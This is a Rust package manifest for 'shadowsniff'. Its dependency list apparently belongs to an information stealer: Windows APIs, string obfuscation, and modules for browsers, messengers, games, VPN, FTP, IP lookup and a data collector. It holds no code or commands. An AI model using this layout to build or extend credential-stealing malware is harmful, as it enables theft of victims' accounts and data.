[package]
name = "shadowsniff"
version = "2.2.0"
edition = "2024"

[dependencies]
windows-sys = { workspace = true }
miniz_oxide = { version = "0.8.9", default-features = false, features = ["with-alloc"] }
obfstr = "0.4.4"
tasks = { path = "../tasks" }
utils = { path = "../utils" }
ftp = { path = "ftp" }
messengers = { path = "messengers" }
browsers = { path = "browsers" }
games = { path = "games" }
vpn = { path = "vpn" }
ipinfo = { path = "../ipinfo" }
collector = { path = "../collector" }
filesystem = { path = "../filesystem" }
